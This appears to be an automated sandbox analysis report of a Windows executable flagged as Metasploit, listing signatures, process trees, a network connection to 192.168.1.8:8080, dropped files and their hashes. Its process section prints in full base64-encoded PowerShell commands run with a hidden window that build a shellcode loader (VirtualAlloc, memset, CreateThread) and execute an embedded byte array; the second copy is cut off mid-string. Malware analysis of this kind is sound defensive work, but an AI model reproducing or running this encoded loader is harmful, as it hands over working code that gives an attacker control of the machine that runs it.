Analysis Overview
SHA256
eeb8950a9f33f84e8442a000383f133bcf6907448fe31d7f81595238d9726d36
Threat Level: Known bad
The file eeb8950a9f33f84e8442a000383f133bcf6907448fe31d7f81595238d9726d36 was found to be: Known bad.
Malicious Activity Summary
MetaSploit
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-04-19 16:46
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-19 16:46
Reported
2024-04-19 16:49
Platform
win7-20240221-en
Max time kernel
131s
Max time network
141s
Command Line
Signatures
MetaSploit
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622.exe
"C:\Users\Admin\AppData\Local\Temp\9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand 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
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -window hidden -EncodedCommand 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
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABNAGcAUwAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAE0AZwBTACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAA5ADcALAAwAHgANgAyACwAMAB4ADIAOAAsADAAeABjADUALAAwAHgAZABiACwAMAB4AGQAZQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgAZQA3ACwAMAB4ADYAYwAsADAAeABjAGEALAAwAHgAMwAwACwAMAB4AGYAYgAsADAAeAA5ADkALAAwAHgAOAA1ACwAMAB4AGIAYgAsADAAeAAwADMALAAwAHgANQBhACwAMAB4AGYAYQAsADAAeAA4AGEALAAwAHg
AZAAxACwAMAB4ADMAZQAsADAAeAA3ADEALAAwAHgAYgBlACwAMAB4AGUANQAsADAAeAAzADcALAAwAHgANgAwACwAMAB4AGIANAAsADAAeAA1ADcALAAwAHgANAA0ACwAMAB4AGUAMAAsADAAeAA5ADkALAAwAHgANAAzACwAMAB4ADYANQAsADAAeAAwADkALAAwAHgAOQA2ACwAMAB4ADEAOQAsADAAeABhAGQALAAwAHgAZgBhACwAMAB4ADEAZQAsADAAeAA5ADcALAAwAHgAOABiACwAMAB4ADMANQAsADAAeABhADEALAAwAHgAOABiACwAMAB4AGUAOAAsADAAeAA1ADQALAAwAHgANQBkACwAMAB4AGQAMQAsADAAeAAzAGMALAAwAHgAYgA3ACwAMAB4ADUAYwAsADAAeAAxAGEALAAwAHgAMwAxACwAMAB4AGIANgAsADAAeAA5ADkALAAwAHgAZQBkACwAMAB4ADMAZgAsADAAeAA1ADcALAAwAHgANwA3ACwAMAB4ADYANgAsADAAeABlAGQALAAwAHgAYgA3ACwAMAB4AGYAMwAsADAAeAAzAGEALAAwAHgAMgBlACwAMAB4AGUAZgAsADAAeAAwADIALAAwAHgANgBhACwAMAB4AGMANQAsADAAeAA0AGYALAAwAHgANwBkACwAMAB4ADAAZgAsADAAeAAxAGEALAAwAHgAMwBiACwAMAB4ADMAMQAsADAAeAAwAGUALAAwAHgANABiACwAMAB4ADkANAAsADAAeAA0ADIALAAwAHgANAA4ACwAMAB4ADQAYgAsADAAeAAxADQALAAwAHgAOAA2ACwAMAB4AGUAMwAsADAAeABjADMALAAwAHgAMABlACwAMAB4AGEAZAAsADAAeAAzAGEALAAwAHgAYQA3ACwAMAB4ADEAMgAsADAAeAA5AGMALAAwAHgANAAzACwAMAB4ADAAMQAsADAAeABlADAALAAwAHgAZQBhACwAMAB4ADMAMAAsADAAeAA5ADMALAAwAHgAMgAwACwAMAB4ADIAMwAsADAAeAA4ADYALAAwAHgANQA1ACwAMAB4ADAAMwAsADAAeAA0ADkALAAwAHgAYQBhACwAMAB4ADUANwAsADAAeAA1AGIALAAwAHgANgBhACwAMAB4ADUAMgAsADAAeAAyADIALAAwAHgAOQA3ACwAMAB4ADgAOAAsADAAeABlAGYALAAwAHgAMwA1ACwAMAB4ADYAYwAsADAAeABmADIALAAwAHgAMgBiACwAMAB4AGIAMwAsADAAeAA3ADMALAAwAHgANQA0ACwAMAB4AGIAOAAsADAAeAA2ADMALAAwAHgANQAwACwAMAB4ADYANAAsADAAeAA2AGQALAAwAHgAZgA1ACwAMAB4ADEAMwAsADAAeAA2AGEALAAwAHgAZABhACwAMAB4ADcAMQAsADAAeAA3AGIALAAwAHgANgBmACwAMAB4AGQAZAAsADAAeAA1ADYALAAwAHgAZgA3ACwAMAB4ADgAYgAsADAAeAA1ADYALAAwAHgANQA5ACwAMAB4AGQAOAAsADAAeAAxAGQALAAwAHgAMgBjACwAMAB4ADcAZQAsADAAeABmAGMALAAwAHgANAA2ACwAMAB4AGYANwAsADAAeAAxAGYALAAwAHgAYQA1ACwAMAB4ADIAMgAsADAAeAA1ADYALAAwAHgAMQBmACwAMAB4AGIANQAsADAAeAA4AGIALAAwAHgAMAA3ACwAMAB4ADgANQAsADAAeABiAGQALAAwAHgAMwBlACwAMAB4ADUAZQAsADAAeABiADkALAAwAHgAMwBkACwAMAB4AGMAMQAsADAAeAA1AGYALAAwAHgAZQA3ACwAMAB4AGEAOQAsADAAeAAwAGQALAAwAHgAYQBkACwAMAB4ADEAOAAsADAAeAAyAGEALAAwAHgAMQBhACwAMAB4AGEANgAsADAAeAA2AGIALAAwAHg
AMQA4ACwAMAB4ADgANQAsADAAeAAxAGMALAAwAHgAZQA0ACwAMAB4ADEAMAAsADAAeAA0AGUALAAwAHgAYgBhACwAMAB4AGYAMwAsADAAeAAyADEALAAwAHgANQA4ACwAMAB4ADMAZAAsADAAeAAyAGIALAAwAHgAOAA5ACwAMAB4ADAAOQAsADAAeABjADAALAAwAHgAYwBjACwAMAB4AGUAYQAsADAAeAAwADAALAAwAHgAMAA2ACwAMAB4ADkAOAAsADAAeABiAGEALAAwAHgAMwBhACwAMAB4AGEAZgAsADAAeABhADEALAAwAHgANQAwACwAMAB4AGIAYgAsADAAeAA1ADAALAAwAHgANwA0ACwAMAB4AGMAYwAsADAAeABiADEALAAwAHgAYwA2ACwAMAB4AGIANwAsADAAeABiADkALAAwAHgAYwA3ACwAMAB4ADEAZQAsADAAeAA1ADAALAAwAHgAYgA4ACwAMAB4AGMANwAsADAAeAAwADEALAAwAHgAMwAwACwAMAB4ADMANQAsADAAeAAyADEALAAwAHgANgBkACwAMAB4ADYAMAAsADAAeAAxADYALAAwAHgAZgBlACwAMAB4AGMAZAAsADAAeABkADAALAAwAHgAZAA2ACwAMAB4AGEAZQAsADAAeABhADUALAAwAHgAMwBhACwAMAB4AGQAOQAsADAAeAA5ADEALAAwAHgAZAA1ACwAMAB4ADQANAAsADAAeAAzADMALAAwAHgAYgBhACwAMAB4ADcAZgAsADAAeABhAGIALAAwAHgAZQBhACwAMAB4ADkAMgAsADAAeAAxADcALAAwAHgANQAyACwAMAB4AGIANwAsADAAeAA2ADkALAAwAHgAOAA2ACwAMAB4ADkAYgAsADAAeAA2AGQALAAwAHgAMQA0ACwAMAB4ADgAOAAsADAAeAAxADAALAAwAHgAOAAyACwAMAB4AGUAOAAsADAAeAA0ADYALAAwAHgAZAAxACwAMAB4AGUAZgAsADAAeABmAGEALAAwAHgAMwBlACwAMAB4ADEAMQAsADAAeABiAGEALAAwAHgAYQAxACwAMAB4AGUAOAAsADAAeAAyAGUALAAwAHgAMQAwACwAMAB4AGMAZgAsADAAeAAxADQALAAwAHgAYgBiACwAMAB4ADkAZgAsADAAeAA0ADYALAAwAHgANAAzACwAMAB4ADUAMwAsADAAeABhADIALAAwAHgAYgBmACwAMAB4AGEAMwAsADAAeABmAGMALAAwAHgANQBkACwAMAB4AGUAYQAsADAAeABiADgALAAwAHgAMwA1ACwAMAB4AGMAOAAsADAAeAA1ADUALAAwAHgAZAA2ACwAMAB4ADMAOQAsADAAeAAxAGMALAAwAHgANQA2ACwAMAB4ADIANgAsADAAeAA2AGMALAAwAHgANwA2ACwAMAB4ADUANgAsADAAeAA0AGUALAAwAHgAYwA4ACwAMAB4ADIAMgAsADAAeAAwADUALAAwAHgANgBiACwAMAB4ADEANwAsADAAeABmAGYALAAwAHgAMwA5ACwAMAB4ADIAMAAsADAAeAA4ADIALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA5ADUALAAwAHgAMAA1ACwAMAB4ADYAOQAsADAAeAA5ADYALAAwAHgAYwAwACwAMAB4ADYAMgAsADAAeAAzADYALAAwAHgANgA5ACwAMAB4ADIANwAsADAAeAA3ADMALAAwAHgAMABhACwAMAB4AGIAYwAsADAAeAAwADEALAAwAHgAMAAxACwAMAB4ADYAMgAsADAAeAA3AGMAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEEAQgBUAHUAPQAkAHc
AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEEAQgBUAHUALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEEAQgBUAHUALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nlh19w38.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37A5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC37A4.tmp"
Network
| Country | Destination | Domain | Proto |
| N/A | 192.168.1.8:8080 | N/A | tcp |
Files
memory/2168-0-0x0000000000E30000-0x0000000000E3A000-memory.dmp
memory/2168-1-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp
memory/3012-6-0x0000000002C50000-0x0000000002CD0000-memory.dmp
memory/3012-7-0x000000001B690000-0x000000001B972000-memory.dmp
memory/3012-8-0x0000000002080000-0x0000000002088000-memory.dmp
memory/3012-9-0x000007FEF37A0000-0x000007FEF413D000-memory.dmp
memory/3012-10-0x0000000002C50000-0x0000000002CD0000-memory.dmp
memory/3012-11-0x000007FEF37A0000-0x000007FEF413D000-memory.dmp
memory/3012-12-0x0000000002C50000-0x0000000002CD0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2QTD3V5Q7LWGAFZKNGA6.temp
| MD5 | dc3a05e3dae1b8c8dbbf528a0cae46fc |
| SHA1 | 11e27eb193c0a9a828a1907ddb5dee6a6eb10145 |
| SHA256 | 7ac6b08f7f096178813cf1b65e605ebebec4e3fe2b91b2030e808d2b126ffe84 |
| SHA512 | b782b2000367a4a3c3fce996133dc85f1548ee8c386b831c9d89484dfc7c23d8b2e517c7ff576eb145ca9d7fdcb36cc872849836c7f2c148b778fe79102e53d7 |
memory/2536-15-0x0000000073220000-0x00000000737CB000-memory.dmp
memory/2536-16-0x0000000002AF0000-0x0000000002B30000-memory.dmp
memory/2536-17-0x0000000073220000-0x00000000737CB000-memory.dmp
memory/2536-18-0x0000000002AF0000-0x0000000002B30000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\nlh19w38.cmdline
| MD5 | 02a944b4ad532b30993b53b510760d8f |
| SHA1 | 04ff81144a3456b01ff3c5a3442db57c5606d732 |
| SHA256 | 8f3efa70c0bace1aa5ebefc1c1ac0681289f5e194f79823c8a21810da51f8f45 |
| SHA512 | e31e57c5396ae53e5f1674f9cc9a950902622470c9f6a1f276d8eafad0ba37886febb46412dceaeeeb47c8abef9a7fa9a7c3ab9958bf9f3353f682be9c65a799 |
\??\c:\Users\Admin\AppData\Local\Temp\nlh19w38.0.cs
| MD5 | 7319070c34daa5f6f2ece2dfc07119ee |
| SHA1 | f26a4a48518a5608e93c8b77368f588b0433973c |
| SHA256 | b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc |
| SHA512 | 34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd |
\??\c:\Users\Admin\AppData\Local\Temp\CSC37A4.tmp
| MD5 | e4cd4aeea583065372971c2a5d6003d4 |
| SHA1 | fc448a91047a3be235764ce302c198e22e861357 |
| SHA256 | 53da6544a45748fe2f25e5eb4cbf632efe4825e0f54471d4aa3dc8c85e3c7dd1 |
| SHA512 | b06d35d00f6de7299ef17ec9822a6d3f196ca414f1a5420696224653e6f5a72540f2b27bdcce53f3def569ff20475de5be233979f9c80891344a8066f5e57fe0 |
memory/2928-28-0x0000000000AE0000-0x0000000000B20000-memory.dmp
memory/3012-24-0x000007FEF37A0000-0x000007FEF413D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RES37A5.tmp
| MD5 | f5deb5d2eaaaecfeb9603afe891fd4b7 |
| SHA1 | 674e7c9fc72058e92599d8cc9c0cf0f00894a7a3 |
| SHA256 | 7af5aa4cff9e6af6563efc0f6f93a97ae3c359fcb62b91833aca96b412219d77 |
| SHA512 | aae83ecbbee11d6e6b93f11c1e444d96538379ae086bc95180c83a4ce9ad342d029a7944aec6c1727c730998190b18228a318360b690d95d0dbd9aac127e8cfe |
C:\Users\Admin\AppData\Local\Temp\nlh19w38.dll
| MD5 | 21239c2e089947d4e073c3effe845084 |
| SHA1 | ebb1f39c9d0cfd263fa16fc42455fcfb0fd261a4 |
| SHA256 | 2ab28ee4d15abd12320c640da8bc5fd7ff1a6489fb1fef82623ebe6ad5e0492c |
| SHA512 | ba348c9070120158434dcd9b42a9bbb047faae6bfd9f4c2ef9d75cb17f078d5a7dc4b78903bc94c136357de29526adf4eb342b89da075d454e1497a7d02c835a |
C:\Users\Admin\AppData\Local\Temp\nlh19w38.pdb
| MD5 | 641904e96d329521cce233e0668456ab |
| SHA1 | 07415387d44584e6b164f524fd2a70a926774953 |
| SHA256 | 643310c49f06b94e4cb21ffbdad8e6d6f8ef2ad75cc3cd4afcd6161bc18205c9 |
| SHA512 | b99949580d7d16444b8d3a9ba751f759c81855665cefe573f91ab9d76681b5ea7902c7a0ca28b020cdc9019a1a0d68ea7aced592464762a2eccb40445cd104da |
memory/2536-36-0x0000000002CF0000-0x0000000002CF1000-memory.dmp
memory/2536-37-0x0000000002CF0000-0x0000000002CF1000-memory.dmp
memory/2168-38-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp
memory/3012-39-0x0000000002C50000-0x0000000002CD0000-memory.dmp
memory/3012-40-0x0000000002C50000-0x0000000002CD0000-memory.dmp
memory/3012-41-0x000007FEF37A0000-0x000007FEF413D000-memory.dmp
memory/3012-42-0x0000000002C50000-0x0000000002CD0000-memory.dmp
memory/3012-43-0x0000000002C50000-0x0000000002CD0000-memory.dmp
memory/2536-44-0x0000000073220000-0x00000000737CB000-memory.dmp
memory/2536-45-0x0000000002AF0000-0x0000000002B30000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-19 16:46
Reported
2024-04-19 16:49
Platform
win10v2004-20240412-en
Max time kernel
140s
Max time network
149s
Command Line
Signatures
MetaSploit
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622.exe
"C:\Users\Admin\AppData\Local\Temp\9e6c00d495107c977eda44aee56a8a54225cc0e6f15fa084161ffe8cde6ab622.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand 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
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -window hidden -EncodedCommand JAA3AHkAVwB4ACAAPQAgACcAJABNAGcAUwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABNAGcAUwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAOQA3ACwAMAB4ADYAMgAsADAAeAAyADgALAAwAHgAYwA1ACwAMAB4AGQAYgAsADAAeABkAGUALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADcAMAAsADAAeAAxADIALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMAAzACwAMAB4AGUANwAsADAAeAA2AGMALAAwAHgAYwBhACwAMAB4ADMAMAAsADAAeABmAGIALAAwAHgAOQA5ACwAMAB4ADgANQAsADAAeABiAGIALAAwAHgAMAAzACwAMAB4ADUAYQAsADAAeABmAGEALAAwAHgAOABhAC
wAMAB4AGQAMQAsADAAeAAzAGUALAAwAHgANwAxACwAMAB4AGIAZQAsADAAeABlADUALAAwAHgAMwA3ACwAMAB4ADYAMAAsADAAeABiADQALAAwAHgANQA3ACwAMAB4ADQANAAsADAAeABlADAALAAwAHgAOQA5ACwAMAB4ADQAMwAsADAAeAA2ADUALAAwAHgAMAA5ACwAMAB4ADkANgAsADAAeAAxADkALAAwAHgAYQBkACwAMAB4AGYAYQAsADAAeAAxAGUALAAwAHgAOQA3ACwAMAB4ADgAYgAsADAAeAAzADUALAAwAHgAYQAxACwAMAB4ADgAYgAsADAAeABlADgALAAwAHgANQA0ACwAMAB4ADUAZAAsADAAeABkADEALAAwAHgAMwBjACwAMAB4AGIANwAsADAAeAA1AGMALAAwAHgAMQBhACwAMAB4ADMAMQAsADAAeABiADYALAAwAHgAOQA5ACwAMAB4AGUAZAAsADAAeAAzAGYALAAwAHgANQA3ACwAMAB4ADcANwAsADAAeAA2ADYALAAwAHgAZQBkACwAMAB4AGIANwAsADAAeABmADMALAAwAHgAMwBhACwAMAB4ADIAZQAsADAAeABlAGYALAAwAHgAMAAyACwAMAB4ADYAYQAsADAAeABjADUALAAwAHgANABmACwAMAB4ADcAZAAsADAAeAAwAGYALAAwAHgAMQBhACwAMAB4ADMAYgAsADAAeAAzADEALAAwAHgAMABlACwAMAB4ADQAYgAsADAAeAA5ADQALAAwAHgANAAyACwAMAB4ADQAOAAsADAAeAA0AGIALAAwAHgAMQA0ACwAMAB4ADgANgAsADAAeABlADMALAAwAHgAYwAzACwAMAB4ADAAZQAsADAAeABhAGQALAAwAHgAMwBhACwAMAB4AGEANwAsADAAeAAxADIALAAwAHgAOQBjACwAMAB4ADQAMwAsADAAeAAwADEALAAwAHgAZQAwACwAMAB4AGUAYQAsADAAeAAzADAALAAwAHgAOQAzACwAMAB4ADIAMAAsADAAeAAyADMALAAwAHgAOAA2ACwAMAB4ADUANQAsADAAeAAwADMALAAwAHgANAA5ACwAMAB4AGEAYQAsADAAeAA1ADcALAAwAHgANQBiACwAMAB4ADYAYQAsADAAeAA1ADIALAAwAHgAMgAyACwAMAB4ADkANwAsADAAeAA4ADgALAAwAHgAZQBmACwAMAB4ADMANQAsADAAeAA2AGMALAAwAHgAZgAyACwAMAB4ADIAYgAsADAAeABiADMALAAwAHgANwAzACwAMAB4ADUANAAsADAAeABiADgALAAwAHgANgAzACwAMAB4ADUAMAAsADAAeAA2ADQALAAwAHgANgBkACwAMAB4AGYANQAsADAAeAAxADMALAAwAHgANgBhACwAMAB4AGQAYQAsADAAeAA3ADEALAAwAHgANwBiACwAMAB4ADYAZgAsADAAeABkAGQALAAwAHgANQA2ACwAMAB4AGYANwAsADAAeAA4AGIALAAwAHgANQA2ACwAMAB4ADUAOQAsADAAeABkADgALAAwAHgAMQBkACwAMAB4ADIAYwAsADAAeAA3AGUALAAwAHgAZgBjACwAMAB4ADQANgAsADAAeABmADcALAAwAHgAMQBmACwAMAB4AGEANQAsADAAeAAyADIALAAwAHgANQA2ACwAMAB4ADEAZgAsADAAeABiADUALAAwAHgAOABiACwAMAB4ADAANwAsADAAeAA4ADUALAAwAHgAYgBkACwAMAB4ADMAZQAsADAAeAA1AGUALAAwAHgAYgA5ACwAMAB4ADMAZAAsADAAeABjADEALAAwAHgANQBmACwAMAB4AGUANwAsADAAeABhADkALAAwAHgAMABkACwAMAB4AGEAZAAsADAAeAAxADgALAAwAHgAMgBhACwAMAB4ADEAYQAsADAAeABhADYALAAwAHgANgBiAC
wAMAB4ADEAOAAsADAAeAA4ADUALAAwAHgAMQBjACwAMAB4AGUANAAsADAAeAAxADAALAAwAHgANABlACwAMAB4AGIAYQAsADAAeABmADMALAAwAHgAMgAxACwAMAB4ADUAOAAsADAAeAAzAGQALAAwAHgAMgBiACwAMAB4ADgAOQAsADAAeAAwADkALAAwAHgAYwAwACwAMAB4AGMAYwAsADAAeABlAGEALAAwAHgAMAAwACwAMAB4ADAANgAsADAAeAA5ADgALAAwAHgAYgBhACwAMAB4ADMAYQAsADAAeABhAGYALAAwAHgAYQAxACwAMAB4ADUAMAAsADAAeABiAGIALAAwAHgANQAwACwAMAB4ADcANAAsADAAeABjAGMALAAwAHgAYgAxACwAMAB4AGMANgAsADAAeABiADcALAAwAHgAYgA5ACwAMAB4AGMANwAsADAAeAAxAGUALAAwAHgANQAwACwAMAB4AGIAOAAsADAAeABjADcALAAwAHgAMAAxACwAMAB4ADMAMAAsADAAeAAzADUALAAwAHgAMgAxACwAMAB4ADYAZAAsADAAeAA2ADAALAAwAHgAMQA2ACwAMAB4AGYAZQAsADAAeABjAGQALAAwAHgAZAAwACwAMAB4AGQANgAsADAAeABhAGUALAAwAHgAYQA1ACwAMAB4ADMAYQAsADAAeABkADkALAAwAHgAOQAxACwAMAB4AGQANQAsADAAeAA0ADQALAAwAHgAMwAzACwAMAB4AGIAYQAsADAAeAA3AGYALAAwAHgAYQBiACwAMAB4AGUAYQAsADAAeAA5ADIALAAwAHgAMQA3ACwAMAB4ADUAMgAsADAAeABiADcALAAwAHgANgA5ACw